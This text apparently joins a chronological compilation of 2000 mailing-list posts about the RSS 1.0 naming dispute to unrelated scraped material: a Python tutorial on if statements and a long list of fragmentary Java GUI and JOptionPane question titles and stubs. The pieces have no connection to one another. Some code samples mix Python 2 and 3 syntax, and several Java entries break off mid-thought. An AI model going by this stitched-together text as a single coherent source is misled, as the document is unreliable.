[re: "RSS 1.0" naming] Hmm, perhaps we should consider changing the name. The problem is that many of us have so much invested in the current name, making it painful to change it. Having two RSS 1.0′s would be even more confusing. I think the name is also deserved, considering the large amount of work spent on making the new spec backwards-compatible with RSS 0.9. It would be different if their we were creating a radically new spec, but we’re not — instead we’re simply adding namespaces and more RDF support to an already existing spec.
[re: simplicity] We disagree on the importance of simplicity. Yes, I like simplicity, but it needs to be balanced. I don’t think that’s the core thing about RSS, I think the core thing about RSS is what it stands for: RDF, sites and summaries.
9/2/2000. Dave Winer: What to do about RSS?
I wish it had turned out this way, then the people who legitimately want to do a Namespaces-and-RDF syndication format would have to choose another name. To their credit, the water is muddied by the departure of Netscape from the process. So there’s now an identity crisis, what is RSS, and who, if anyone, has the right to evolve it?
I think the answer to this question is totally obvious. But as one of the parties to the dispute it’s not up to me to say what it is.
9/4/2000. Ken MacLeod: Re: What to do about RSS
[addressing Dave] From my pov, that the new proposal, by the majority of developers, be “RSS 1.0″ seemed so obvious that it wasn’t until you objected so vehemently that it even crossed my mind.
9/4/2000. David McCusker: Re: TBL
[addressing Dave] I’m not directly involved. In fact I don’t want to be involved. :-) But it’s clear to me you were dispossessed by the naming, and very intentionally so by the folks who chose the name. I’m sensitive to nuances in dispossession.
… Only two main things matter in gauging your dispossesion. First, you were a voluntary party to an earlier version of RSS with certain characteristics. Second, you were involuntary party to the re-use of the old name for a new (but somewhat related) version with strikingly different technical characteristics. Case closed. They owe you. If they don’t pay, then they suck.
9/4/2000. Ken MacLeod: Re: TBL #2
It has been suggested that both forks use a different name.
9/4/2000. David McCusker: Re: RSS name cutting and drying
[addressing Ken] I’d noticed a pronounced absense of negotiation over the naming problem, as if the folks who came up with the proposed RSS 1.0 had responded to Dave by asking coldly, “Who are you, again?” It was the coldness that had a really bad feel to it, provoking my ire.
By the way, you’re doing a fine and human job of discussing the issue in a style I think is very nice. I only really think more responsiveness is required from the RDF+NS folks. The apparent “I don’t know you” reaction suggests bad faith, which folks should scramble to avoid.
[re: "it has been suggested that both forks use a different name"] That’s fair if there are actually two new evolving specs, if both sides agree to sign off. It only seems wrong if one side chooses unilaterally, especially if seeming to arrogate sole ownership to itself. It’s better to part ways amicably than to dump an inconvenient past partner. Folks who dump others inspire less future trust.
9/11/2000. USPTO: Trademark application #78025336: RSS
Mark (words only): RSS
Current Applicant: Userland Software
Filing Date: 2000-09-11
Current Status (2001-12-26): Abandoned: Applicant failed to respond to an Office action.
9/12/2000. Dave Winer:
Recently I have had a standard that I co-authored stolen by a big name, totally brazen, and I’ve said Fuck This many times in the last few weeks, and it hasn’t done any good.
9/13/2000. Dan Brickley: Re:.
9/13/2000. Dan Brickley: Re: #2
You’re mad at us because you think we stole your vision and corrupted it.
I’d like you to stop with the accusations of theft. Last I heard from you on that topic, you still claimed we were thieves. It’d be really nice to hear that retracted.
9/13/2000. Dave Winer: Re: #3
I will retract the statement after the name is changed to something other than RSS 1.0. Until then, however reluctantly, I will stand by the statement I made on the decentralization list, in the context it was posted.
My company has big plans for RSS, and they don’t include advising developers to do namespaces and RDF.
9/13/2000. Dan Brickley: Re: #4
Is it true that the *only* thing that you feel we have stolen is the name. No ideas, no technology, no designs were stolen, just the letters ‘R’,'S’,'S’. Rich Site Summary. RDF Site Summary. Real Simply Syndication. Really silly squabbles…
9/13/2000. Dave Winer: Re: #5
Dan here’s what was stolen.
Before the namegrab I had some influence on and participation in the evolution of RSS.
After the grab, I have no say in its future. I’m reduced to trying to talk you out of the namegrab. I’ve put so many weeks into just doing that. Here’s what it comes down to:
My choice is to accept your version or..?
What if I think it’s wrong? What then?
The provocative act was to take the name of something that exists and put it on something new.
You may not agree, and I don’t want to debate all this *yet again* but that’s what I lost in this and it’s not fair. I worked hard to get RSS to where it is now. Lots of months, down the drain. Why? Why do you want me to go away? What the hell did I ever do to you?
9/13/2000. Dave Winer: Greetings Syndicators!
I’d like to find out if there’s interest here in working beyond RSS 0.91, adding a few features possibly, new docs and howtos, or sample code, or just asking questions about how people do stuff.
… We might even rename our work something like RSS-Classic, so the people who want to own RSS can have their way.
9/20/2000. Tim O’Reilly: Re: Asking Tim
Speaking of RSS, here’s my read on what happened. (I wasn’t directly involved.). The only connection I can see is that the O’Reilly Network ran a series of ads on our sites promoting its stories about the RSS 1.0 spec (just as it promotes other stories on O’Reilly Network sites). Dave never approached me directly to express a point of view such as “I think the RSS spec is going in the wrong direction. Is there anything you can do to help get my point of view across to the other developers?” Instead, the first I heard of it was a series of public accusations that my company was leading a conspiracy to steal “Dave’s” standard.
9/20/2000. Dave Winer: Re: Asking Tim #2″?
9/21/2000. Tim O’Reilly: Re: Asking Tim #3
As I understand it, it was public knowledge (or certainly your knowledge) that there was work going on on a spec to extend RSS. When it was published, it was published as a “proposed RSS 1.0 spec”, and that seems completely legitimate to me, whether or not the work to develop it was done in public or private. The dozen people who worked on it have enough history with RSS to propose anything they like. You personally urged Rael to start the effort to write up what he was thinking as a proposed spec. And a “proposed RSS 1.0 spec” seems like as good a description as any for what they had come up with.
It seems to me that you immediately hardened the battle lines, and started crying foul, when you should instead have said: “I don’t think that this is the right direction for RSS 1.0.” If you’d kept yourself to technical substance instead of vague (and incorrect) accusations of plots masterminded by O’Reilly, this whole contretemps could have been avoided.
As Lao Tzu says, “He who feels pricked, must first have been a bubble.” I believe it was your power grab to unilaterally rewrite the RSS 0.91 spec with a Userland copyright that actually started this whole thing. You were moving to claim RSS as “yours” and a group of other developers put an oar in, and you didn’t like it.
… By any outside reading, your claim to have “created” RSS has no basis. Dan Brickley’s posts to FoRK, the first of which I linked to above, make that fairly clear. Netscape created it, but even then, it is so similar to other things available at the time from a number of players, including Microsoft, that anyone’s claim to ownership are pretty thin. Netscape created the name, and that’s about as close as you can get. You certainly did a lot of work to popularize and support it.
9/21/2000. Dave Winer: Re: Asking Tim #4.
9/21/2000. Tim O’Reilly: Re: Asking Tim #5.
10/12/2000. Ken MacLeod: Re: RSS History
The way that the W3C and the IETF do it is to have working groups. Working groups are made up of people who are knowledgable of the subject (experienced users as well as developers) and are willing to extend the effort to participate in the working group. It is highly regrettable that the decision to form a working group was made only after the RSS 1.0 proposal.
… I can think of no other project or technology that went through a set of circumstances similar to this.
10/12/2000. Dave Winer: Re: RSS History #2
Thanks for the help Ken.
So I guess it would be fair to say that if an outsider looked at this, that there is no precedent for the transition that took place here, this is not how open source projects or W3C or IETF projects fork.
Some people have said that the community decided to go in the direction of Namespaces and RDF, but it’s clear that that did not actually happen.
10/13/2000. Ken MacLeod: Re: RSS History #3
Right, I don’t recall ever seeing anything like this before.
[re: community support] It’s clear that it was not a unanimous decision, yes.
10/13/2000. Dave Winer: Community consensus
The claim has been made, offlist, that there was a community consensus to move to namespaces and RDF and modules. If there was such a consensus, now is the time to show where the record of that is. Ken provided a pointer, but it’s not what I asked for, because no one asked “Is it OK if we call this RSS 1.0?”
The great thing about eGroups is that no one can tamper with the record. If there was a consensus, it *must* be evident here. I went to the trouble to read the archives over the summer. There isn’t that much to read. I found no evidence that the question was ever asked on this list. I know for a fact that I was never asked to vote on the transition, and I don’t think the general membership of this list was asked either.
10/15/2000. Seth Russell: Re: [syndication] changing the name of RSS
I propose that we change the name because it would:
- help heal the rift with Dave Winer,
- encourage a new attitude towards this revolutionary RDF Metadata Feed; and
- [as you indicate] clear up the confusion in the marketplace if the syndication group moves ahead with RSS 9+.
Are there any valid arguments against changing the name?
10/15/2000. Paulo Gaspar: RE: [syndication] changing the name of RSS #2
Yes, changing the name of the RSS 1.0 to something else is what makes more sense – it is the for with the most diferences from the previous version.
10/17/2000. Paulo Gaspar: RE: [syndication] Total confusion in RSS-Land
The only problem I see with your arguments is that you never talk about FORKing, giving another name to RSS 1.0. Both groups could “live amicably” if the “1.0″ group would just agree on that.
… And it makes sense. Even if you do not understand why other people find the RDF solution complex, they still DO. And RSS 0.92 will be much closer to 0.91 than 1.0 is. Is up to 1.0 to get another name.
10/17/2000. Seth Russell: Pick a new name for RSS 1.0
It has been suggested by Dave Winer and others that it is inappropriate to name our standard RSS 1.0. To clear up the confusion that most certainly will emerge in the market place and to give this format a new revolutionary start, it seems appropriate to also give it a new name.
10/18/2000. Jeff Bone: Forking, the name game, the politics of naming
We all seem to acknowledge that there’s too much ideological distance between the camps to reasonably work on a single effort, and therefore forking is inevitable. The controversy is purely on which effort — the new and improved and totally revised and overly complexified effort or the brutally simple incremental improvement effort — gets to keep using the RSS name. Given that the original stakeholders are in favor of the simpler version, IMO they should get to keep the name.
10/19/2000. Mark Ketzler: Re: Forking, the name game, the politics of naming
RSS existed and was being used by lots of folk
Group A (including some of the RSS originators) wanted to make RSS extensible etc.
Group B (including rest of the original group) wanted status quo
This is a fork by Group A. Why should Group B change the name of something that existed. How do you defend this? If the RSS-DEV WG is so concerned about the RSS brand why are you tarnishing it with this name grab?
11/7/2000. Dan Brickley: RSS-Classic, RSS 1.0 and a historical debt
Contrary to what you might hear, the RSS 1.0 proposal did not come from a bunch of outsiders who swooped in and grabbed the prestigious acronym ‘RSS’. RSS 1.0 as proposed is solidly grounded in the original RSS vision, which itself had a long heritage going back to MCF (an RDF precursor) and related specs (CDF etc). This can be seen for example from Guha’s longstanding involvement, and Dan Libby’s account of the Netscape RSS work and endorsement of the 1.0 proposal.
… I believe we have more than adequate historical justification for calling the ‘new’ stuff RSS. To defend this observation requires pointing to a bunch of historical baggage that I’ve previously avoided publicising.
… On the basis of these various observations, we have two traditions, both rooted in Guha’s MCF work.
MCF > CDF > scriptingNews > RSS 0.91 > RSS-Classic
MCF > XML-MCF > RSS 0.90 > RSS 1.0
… To stress my point once more. The RSS 1.0 proposal did not appear from out of nowhere, but is routed in 5 years work in this area. The RSS 1.0 proposers did not swoop in from nowhere to steal the ‘RSS’ acronym.
11/7/2000. Dave Winer: Dan Brickley’s message
I just subscribed to this list for a moment, to rebut Dan’s assertion that <scriptingNews> format was derived from CDF. It was not. It was derived from my experience as a web writer and web app developer and that’s all. I documented my work through 1997-2000 on this stuff, publicly.
11/7/2000. Seth Russell: Re: [RSS-DEV] RSS-Classic, RSS 1.0 and a historical debt
[addressing Dan Brickley] Look, this thing is past the point of justifications being important. … Now, personally I don’t have any vested interest (ego) in either the WG group or in Dave’s group. But it doesn’t feel right to me. I don’t understand the divisive stubbornness that keeps the WG from just changing the name. But I do see the political magic that would happen if we just changed it. Especially since XRSS is the better name anyway and actually names this thing politically correct.
Heal the Rift
Start anew
Change the name!
The name was never changed.
§
I am no longer accepting public comments on this post, but you can use this form to contact me privately. (Your message will not be published.)
§
© 2001–present Mark Pilgrim | http://web.archive.org/web/20110718031950/http:/diveintomark.org/archives/2002/09/06/history_of_the_rss_fork | CC-MAIN-2014-52 | refinedweb | 5,338 | 72.26 |
Python Programming/Conditional Statements
Contents
Decisions[edit]
A Decision is when a program has more than one choice of actions depending on a variable's value. Think of a traffic light. When it is green, we continue our drive. When we see the light turn yellow, we reduce our speed, and when it is red, we stop. These are logical decisions that depend on the value of the traffic light. Luckily, Python has a decision statement to help us when our application needs to make such decision for the user.
If statements[edit]
Here is a warm-up exercise - a short program to compute the absolute value of a number:
absoval.py
n = raw_input("Integer? ")#Pick an integer. And remember, if raw_input is not supported by your OS, use input() n = int(n)#Defines n as the integer you chose. (Alternatively, you can define n yourself) if n < 0: print ("The absolute value of",n,"is",-n) else: print ("The absolute value of",n,"is",n)
Here is the output from the two times that I ran this program:
Integer? -34 The absolute value of -34 is 34 Integer? 1 The absolute value of 1 is 1
What does the computer do when it sees this piece of code? First it prompts the user for a number with the statement "n = raw_input("Integer? ")". Next it reads the line "if n < 0:". If n is less than zero Python runs the line "print "The absolute value of",n,"is",-n". Otherwise python runs the line "print "The absolute value of",n,"is",n".
More formally, Python looks at whether the expression n < 0 is true or false. An if statement is followed by an indented block of statements that are run when the expression is true. After the if statement is an optional else statement and another indented block of statements. This 2nd block of statements is run if the expression is false.
Expressions can be tested several different ways. Here is a table of all of them:
Another feature of the if command is the elif statement. It stands for "else if," which means that if the original if statement is false and the elif statement is true, execute the block of code following the elif statement. Here's an example:
ifloop.py. elif allows multiple tests to be done in a single if statement.
If Example[edit]
High_low.py
# Plays the guessing game higher or lower # (originally written by Josh Cogliati, improved by Quique, now improved # by Sanjith, further improved by VorDd, with continued improvement from # the various Wikibooks contributors.) # This should actually be something that is semi random like the # last digits of the time or something else, but that will have to # wait till a later chapter. (Extra Credit, modify it to be random # after the Modules chapter) # This is for demonstration purposes only. # It is not written to handle invalid input like a full program would. answer = 23 question = 'What number am I thinking of? ' print ('Let\'s play the guessing game!') while True: guess = int(input(question)) if guess < answer: print ('Little higher') elif guess > answer: print ('Little lower') else: # guess == answer print ('MINDREADER!!!') break
Sample run:
Let's play the guessing game! What number am I thinking of? 22 Little higher What number am I thinking of? 25 Little Lower What number am I thinking of? 23 MINDREADER!!!
As it states in its comments, this code is not prepared to handle invalid input (i.e., strings instead of numbers). If you are wondering how you would implement such functionality in Python, you are referred to the Errors Chapter of this book, where you will learn about error handling. For the above code you may try this slight modification of the while loop:
while True: inp = input(question) try: guess = int(inp) except ValueError: print('Your guess should be a number') else: if guess < answer: print ('Little higher') elif guess > answer: print ('Little lower') else: # guess == answer print ('MINDREADER!!!') break
even.py
#Asks for a number. #Prints if it is even or odd print ("Input [x] for exit.") while True: inp = input("Tell me a number: ") if inp == 'x': break # catch any resulting ValueError during the conversion to float try: number = float(inp) except ValueError: print('I said: Tell me a NUMBER!') else: test = number % 2 if test == 0: print (int(number),"is even.") elif test == 1: print (int(number),"is odd.") else: print (number,"is very strange.")
Sample runs.
Tell me a number: 3 3 is odd. Tell me a number: 2 2 is even. Tell me a number: 3.14159 3.14159 is very strange.
average1.py
#Prints the average value. print ("Welcome to the average calculator program") print ("NOTE- THIS PROGRAM ONLY CALCULATES AVERAGES FOR 3 NUMBERS") x = int(input("Please enter the first number ")) y = int(input("Please enter the second number ")) z = int(input("Please enter the third number ")) str = x+y+z print (float (str/3.0)) #MADE BY SANJITH sanrubik@gmail.com
Sample runs
Welcome to the average calculator program NOTE- THIS PROGRAM ONLY CALCULATES AVERAGES FOR 3 NUMBERS Please enter the first number 7 Please enter the second number 6 Please enter the third number 4 5.66666666667
average2.py
#keeps asking for numbers until count have been entered. #Prints the average value. sum = 0.0 print ("This program will take several numbers, then average them.") count = int(input("How many numbers would you like to sum: ")) current_count = 0 while current_count < count: print ("Number",current_count) number = float(input("Enter a number: ")) sum = sum + number current_count += 1 print("The average was:",sum/count)
Sample runs
This program will take several numbers, then average them. How many numbers would you like to sum: 2 Number 0 Enter a number: 3 Number 1 Enter a number: 5 The average was: 4.0 This program will take several numbers, then average them. How many numbers would you like to sum: 3 Number 0 Enter a number: 1 Number 1 Enter a number: 4 Number 2 Enter a number: 3 The average was: 2.66666666667
average3.py
#Continuously updates the average as new numbers are entered. print "Welcome to the Average Calculator, please insert a number" currentaverage = 0 numofnums = 0 while True: newnumber = int(raw_input("New number ")) numofnums = numofnums + 1 currentaverage = (round((((currentaverage * (numofnums - 1)) + newnumber) / numofnums), 3)) print ("The current average is " + str((round(currentaverage, 3))))
Sample runs
Welcome to the Average Calculator, please insert a number New number 1 The current average is 1.0 New number 3 The current average is 2.0 New number 6 The current average is 3.333 New number 6 The current average is 4.0 New number
If Exercises[edit]
- Write a password guessing program to keep track of how many times the user has entered the password wrong. If it is more than 3 times, print You have been denied access. and terminate the program. If the password is correct, print You have successfully logged in. and terminate the program.
- Write a program that asks for two numbers. If the sum of the numbers is greater than 100, print That is a big number and terminate the program.
- Write a program that asks the user their name. If they enter your name, say "That is a nice name." If they enter "John Cleese" or "Michael Palin", tell them how you feel about them ;), otherwise tell them "You have a nice name."
- Ask the user to enter the password. If the password is correct print "You have successfully logged in" and exit the program. If the password is wrong print "Sorry the password is wrong" and ask the user to enter the password 3 times. If the password is wrong print "You have been denied access" and exit the program.
## Password guessing program using if statement and while statement only ### source by zain guess_count = 0 correct_pass = 'dee234' while True: pass_guess = str(input("Please enter your password: ")) guess_count += 1 if pass_guess == correct_pass: print ('You have succesfully logged in.') break elif pass_guess != correct_pass: if guess_count >= 3: print ("You have been denied access.") break
def mard(): for i in range(1,4): a = raw_input("enter a password: ") # to ask password b = "sefinew" # the password if a == b: # if the password entered and the password are the same to print. print("You have successfully logged in") exit()# to terminate the program. Using 'break' instead of 'exit()' will allow your shell or idle to dump the block and continue to run. else: # if the password entered and the password are not the same to print. print("Sorry the password is wrong ") if i == 3: print("You have been denied access") exit() # to terminate the program mard()
#Source by Vanchi import time import getpass password = getpass.getpass("Please enter your password") print "Waiting for 3 seconds" time.sleep(3) got_it_right = False for number_of_tries in range(1,4): reenter_password = getpass.getpass("Please reenter your password") if password == reenter_password: print "You are Logged in! Welcome User :)" got_it_right = True break if not got_it_right: print "Access Denied!!"
Conditional Statements[edit]
Many languages (like Java and PHP) have the concept of a one-line conditional (called The Ternary Operator), often used to simplify conditionally accessing a value. For instance (in Java):
int in= ; // read from program input // a normal conditional assignment int res; if(number < 0) res = -number; else res = number;
For many years Python did not have the same construct natively, however you could replicate it by constructing a tuple of results and calling the test as the index of the tuple, like so:
number = int(raw_input("Enter a number to get its absolute value:")) res = (-number, number)[number > 0]
It is important to note that, unlike a built in conditional statement, both the true and false branches are evaluated before returning, which can lead to unexpected results and slower executions if you're not careful. To resolve this issue, and as a better practice, wrap whatever you put in the tuple in anonymous function calls (lambda notation) to prevent them from being evaluated until the desired branch is called:
number = int(raw_input("Enter a number to get its absolute value:")) res = (lambda: number, lambda: -number)[number < 0]()
Since Python 2.5 however, there has been an equivalent operator to The Ternary Operator (though not called such, and with a totally different syntax):
number = int(raw_input("Enter a number to get its absolute value:")) res = -number if number < 0 else number
Switch[edit] ("Bye") def hola(): print ("Hola is Spanish for Hello") def adios(): print ("Adios is Spanish for Bye") # Notice that our switch statement is a regular variable, only that we added the function's name inside # and there are no quotes menu = [hello,bye,hola,adios] # To call our switch statement, we simply make reference to the array with a pair of parentheses # at the end to call the function menu[3]() # calls the adios function since is number 3 in our array. menu[0]() # Calls the hello function being our first element in our array. menu[x]() # Calls the bye function as is the second element on the array x = 1
This works because Python stores a reference of the function in the array at its particular index, and by adding a pair of parentheses we are actually calling the function. Here the last line is equivalent to:
Another way. Using function through user Input[edit]
go = "y" x = 0 def hello(): print ("Hello") def bye(): print ("Bye") def hola(): print ("Hola is Spanish for Hello") def adios(): print ("Adios is Spanish for Bye") menu = [hello, bye, hola, adios] while x < len(menu) : print "function", menu[x].__name__, ", press " , "[" + str(x) + "]" x += 1 while go != "n": c = input("Select Function: ") menu[c]() go = raw_input("Try again? [y/n]: ") print "\nBye!" #end
Another way[edit]
if x == 0: hello() elif x == 1: bye() elif x == 2: hola() else: adios()
Another way[edit]
Another way is to use lambdas. Code pasted here with permissions[1][dead link].
result = { 'a': lambda x: x * 5, 'b': lambda x: x + 7, 'c': lambda x: x - 2 }[value](x)
For more information on lambda see anonymous functions in the function section. | https://en.wikibooks.org/wiki/Python_Programming/Conditional_Statements | CC-MAIN-2017-13 | refinedweb | 2,025 | 62.17 |
Containers
Java NotesContainers
Top-level Containers - window, applet, dialog... container in Java 2.
You can also set the content pane to
a new JPanel... Dialogs.
You will use these three types of top-level containers
GUI Tips
Java NotesGUI Tips
[Beginning of list of GUI tips -- needs much more... (eg, actionPerformed)
may be mixed in with the GUI construction code....
Events and communication
After the GUI is constructed, the program stops execution
GUI
GUI How to GUI in Net-beans ... ??
Please visit the following link:
Summary - GUI Containers
Java: Summary - GUI Containers
In this section we are going to discuss about GUI Containers.
We will discuss following GUI Containers.
a) JFrame
b) JOptionPane
c) JScrollPane
d) JTabbedPane
Top-level Container
Array in JOptionPane - Java Beginners
an array in a JOptionPane.
I am supposed to make a 2 dimensional int array called BlasTable. I'm supposed to use a method to print the array in a JOptionPane....
It might seem like a stupid question but if you have any tips please reply
Containers
Containers
... of the Java Runtime Environment
(JRE). Any image which is bigger in size... the scrolling of the large image. In the program code below, first
of all we have....
Thanks,
Valarmathi Hi Friend,
Try the following code
joptionpane - Java Beginners
joptionpane Hi,
I need to hide the joptionpane message dialogs... enter only string");
}
}
}
Please send the sample code as soon as possible.
Thanks,
Valarmathi Hi Friend,
Try the following code
Java GUI code
Java GUI code Write a GUI program to compute the amount of a certificate of deposit on maturity. The sample data follows:
Amount deposited..., computer 80000.00 (1+7.75 /100)^15
Hi Friend,
Try the following code
Convert the code to GUI
Java GUI Class Example Java GUI Class Example
Convert the code to GUI
GUI Java JSP application GUI Java JSP application
Convert the code to GUI
Java and GUI application Example Java and GUI application Example
Convert the code to GUI
Java Code to GUI can any one convert My code to GUI code
Convert the code to GUI
How to create GUI application in Java How to create GUI application in Java
JOptionPane - Java Beginners
. This homework is concerned mainly with these two features of Java. Write... and output should be via JOptionPane dialogue boxes. Examples are shown below
Rental Code GUI - Java Beginners
Rental Code GUI dear sir...
i would like to ask some code of java GUI form that ask the user will choose
the menu to input
Disk #:
type:
title:
record company:
price:
director:
no. of copies
Java ComboBox in JOptionPane
Java ComboBox in JOptionPane
In this section, you will learn how to create combo box in JOptionPane dialog box. We have created a button to perform...;
Here is the code:
import java.awt.*;
import
Convert this code to GUI - Java Beginners
Convert this code to GUI I have written this.i need to convert the following code to GUI:-
import java.awt.*;
import java.applet.*;
import...);
}
} hi friend,
We have convert your code into GUI
How to convert this Java code into GUI?
How to convert this Java code into GUI? import java.util.Scanner;
public class StudentMarks {
double totalMarks;
String grade;
public void setTotalMarks(double totalMarks) {
this.totalMarks = totalMarks
Unable looping using JOptionPane - Java Beginners
,
Try the following code:
import javax.swing.*;
public class Shop{
public
Component gui - Java Beginners
Component gui Can you give me an example of Dialog in java Graphical...;
String str; // Temporary storage for JOptionPane input.
//Read three...://
Thanks
Java GUI
Java GUI 1) Using Java GUI, create a rectangular box that changes color each time a user click a change color button.
2) Modify Question 1 to include a new button named insert image, that allow user to insert a bitmap image
Catching Exceptions in GUI Code - Java Tutorials
.style1 {
text-align: center;
}
Catching uncaught exception in GUI
In this section, we will discuss how to catch uncaught exceptions in GUI.
Lets see the given below code to identify the uncaught exception :
import
GUI 2 - Java Beginners
GUI 2 How can I modify this code? Please give me a GUI...;GUI Example");pack();show();}public void actionPerformed(ActionEvent event...); }}//newly added code//KeyEvent function public void numberTextField_KeyTyped
Get and Display using JOptionPane
on in because this is my first time handling java. She ask to get some data from student, name and age, by using JOptionPane. Then display it.
Really
Java GUI
Java GUI difference between swing and applet
Java GUI - Java Beginners
Java GUI HOW TO ADD ICONS IN JAVA GUI PROGRAMMES
Java GUI - Applet
Java GUI HELLO,
i am working on java chat server, i add JFrame and make GUI structure by draging buttons and labels, now i want to insert image on left corner JLable. how thats possible? Hi friend,
Code
GUI - Java Beginners
. Send me the code please. Hi Friend,
Please visit the following links:
GUI - Java Beginners
GUI testing GUI testing in software testing HiNow, use the code and get the answer.import javax.swing.*;public class DemoTryCatchDialog...;GUI Example");pack();show();}public void actionPerformed(ActionEvent event
Java GUI IndexOf - Java Beginners
Java GUI IndexOf Hello and thank you for having this great site. Here is my problem.
Write a Java GUI application called Index.java that inputs... Friend,
Try the following code:
import java.awt.*;
import javax.swing.
Java GUI Program - Java Beginners
Java GUI Program How is the following program supposed to be coded... created by the application.
Hi friend,
I am sending running code. I hope, This code will help you.
import java.io.*;
public class
GUI - Java Beginners
GUI whats wrong with my code failed to compile
// Department interface
//import java.sql.*;
import javax.swing.*;
import java.awt.event.*;
import java.awt.*;
class EmployeeInformation extends JFrame implements
Gui - Java Beginners
Gui How can i set a background color in my code and also put the Gender panel in the middle or center of the Personal details and The Buttons the adding an image on the label Inpatients maintainance module and also increasing
While Loop with JOptionPane
While Loop with JOptionPane Hello there,
why the output only catch the last input? can you correct my coding here? This is my first time exploring Java.
import javax.swing.*;
class JOPtionPaneExample
Java Gui - Java Beginners
Java Gui HOW TO ADD LINK LABELS IN JAVA PROGRAMMES
GUI Alternatives
, it isn't difficult to build a Graphical User Interface (GUI) in Java,
but it is hard... to use the
Java GUI libraries to build your GUI. There are alternatives... your interface be in Java? You can use existing GUI technologies
like Flash
Interview Tips - Java Interview Questions
Interview Tips Hi,
I am looking for a job in java/j2ee.plz give me interview tips. i mean topics which i should be strong and how to prepare. Looking for a job 3.5yrs experience
Writing a GUI program - Java Beginners
where and what i should put into the overall code. Also I can't quite figure out how to write the code for the GUI. Could anyone please help? Hi Friend...Writing a GUI program Hello everyone!
I'm trying to write a program
java gui - Java Beginners
java gui i have to create dynamically databse,table, and number of field..inside that field dynamically data can be entered with type of variable..after entering all the dat in different form field label,i should have a button
Tips & Tricks
Tips & Tricks
Splash
Screen in Java 6.0
Splash screens are standard part of many GUI applications to let the user know about starting database - Java Beginners
java gui database I have eight files. Each file has exactly same... the data on command line but I do not know how to display the same using java gui. Could anybody help me.
Thanks.
Shah
java programming code - Java Beginners
using JOptionPane GUI. The letters and digits on a telephone are grouped...java programming code Design and write a Java application that takes...;Hi Friend,
Try the following code:
import java.util.*;
import... and multiplication.
But use classes
javax swing
java awt
java awt.event
no other...://
Thanks
java GUI program - Java Beginners
java GUI program java program that creates the following GUI, when user enter data in the
textfield, the input will be displayed in the textarea...://
Thanks.
Amardeep
Java: Basic GUI
Java NotesBasic GUI
Next - Big Blob
This first example just shows what...
16
17
18
// structure/CalcV1.java
// Fred Swartz - December 2004
// GUI Organization: All work is in the GUI constructor.
//
// (1) Main creates
java code - Java Beginners
java code Hi !I have already built a program for chatting (with GUI's ),but it works only with single client and single server.Can you please send me a java code for chatting which works with multiple clients an single server
GUI convert to celsius program - Java Beginners
GUI convert to celsius program how to write java GUI program... friend,
Code to convert Fahrenheit to Celsius :
import java.awt.... information on Swing Examples visit to :
Summary - Basic GUI Elements
Java: Summary - Basic GUI Elements
In this tutorial we will learn about Basic GUI elements in Java program.
Following table summarizes the variable... the useful methods of JFrame.
Top-level Containers (JFrame)
JFrame - window
Rationale for GUI tutorial decisions
Table of Contents
Rationale for GUI tutorial decisions
Java offers many... that some Java textbooks are
written without any GUI coverage, and others cover..., the percentage of
the code that is related to the GUI becomes smaller
urgent help needed in JDBC AND JAVA GUI - JDBC
want any one to help me convert from scanner to java GUI for this code, and connect it to mysql database
thanks
the code is
//1st class for creating...urgent help needed in JDBC AND JAVA GUI my application allows
Java Code - Java Beginners
Java Code Code an application with a GUI that provides 3 menu options:
1: List Entries
2: Add Entries
3: Exit
Prompt for an option
If the user selects the first menu option, the application displays
Login Form with Java GUI using Netbeans
Login Form with Java GUI using Netbeans Hi there!
I'm a beginner in Java. I've created 2 class files:
1) TestAssign.java
2) NewFrame.java
How can I... and general manager. How/where should I code it?
TestAssign.java
import javax.swing.
Gui plz help
Gui plz help Create a Java application that would allow a person... far. so basically what i did is i used the java palletes to make a application... handling code here:
try{
int num = Integer.parseInt(jLabel4.getText
JOptionPane - Simple Dialogs
Prev: none | Next: JOptionPane - More Dialogs
Java: JOptionPane - Simple...
that allow you to easily create dialog boxes for input and output.
The Java API documentation has many more JOptionPane options, but these
are sufficient
bank account gui
; Transaction>();
I already done with the GUI i just need the code to make the button....";
}
}
For more information, visit the following link:
MultiClient-server tcp-ip with GUI in java
MultiClient-server tcp-ip with GUI in java i wanna MultiClient-server tcp-ip with GUI in java
GUI testing/software testing - Java Beginners
GUI testing/software testing how to create a GUI testing/software testing module in java
Rainfall GUI Questions
Java NotesRainfall GUI Questions
Name ______________________________
This is part of the code to implement the GUI that was used with the Rainfall...
46
// RainfallGUI.java - Provides a GUI interface to the RainfallStats class
Tips and Tricks
and keyboard related operation through java code for the purposes of test automation, self...Tips and Tricks
... in Java
Java provides a lot of fun while programming. This article shows you how
Netbeans GUI Ribbon
Netbeans GUI Ribbon how to create ribbon task in java GUI using netbeans
Java Code - Java Beginners
Java Code I need to modify the following code/GUI so that not only does it calculate the volume of a swimming pool, but it tells how much water is needed and how much is costs to fill up the pool if water is .77 cents per cubic
GUI - Swing vs. AWT
Java: GUI - Swing vs. AWT
The original graphical user interface (GUI) for Java
was called the Abstract Windowing Toolkit (AWT).
Performance and extendability problems with AWT
were resolved by introducing a new GUI interface,
known
Regarding GUI Applications
Regarding GUI Applications How to create a save and open jmenu item in java desktop application
Magic Matrix in GUI
Magic Matrix in GUI I want program in java GUI contain magic matrix for numbers
Dojo Tool tips
tips and how to developed it
in dojo.
Tool tips : This is a GUI...Dojo Tool tips
....
Here is the code of program:
<html>
<
how to refresh my GUI page
how to refresh my GUI page how to refresh a GUI in java
Jigloo SWT/Swing GUI Builder
both
Swing and SWT GUI classes.
Jigloo creates and manages code for all... Jigloo SWT/Swing GUI Builder
CloudGarden's Jigloo GUI Builder is a plugin
how to save a gui form in core java
how to save a gui form in core java please help me
i am java beginner
how to save a jframe containing jtable and panels in java
thank you
plz help me to create gui using Java netbeans
plz help me to create gui using Java netbeans Hi,
I am unable to fetch a particular data from DB.I am using netbeans for creating GUI. If I want...,
Try the following code:
import java.awt.*;
import java.sql.*;
import
Serializing GUI Components Across Network - tutorial
Serializing GUI Components Across Network
2001-03-14 The Java Specialists' Newsletter [Issue 013a] - Serializing GUI Components Across Network
Author... to as many
people as you know who might be interested in Java.
Serializing GUI javax.swing.*;
import java.awt.event.*;
public class MarkStudent {
double
Java gui program for drawing rectangle and circle
Java gui program for drawing rectangle and circle how to write java gui program for drawing rectangle and circle?
there shoud be circle and rectangle button, check box for bold and italic, and radio button red,green and blue
JAVA code For
JAVA code For JAVA code For "Traffic signals Identification for vehicles
How To Pass data from one GUI to another in java swing
How To Pass data from one GUI to another in java swing I'm new to java and part of our assignment is to build a GUI and display a result set from... selection and display those values to a table. My code is something like
Selecting elements of 2D array with GUI
a Java application with GUI (JFrame form) that is supposed to display all... for each row or column.
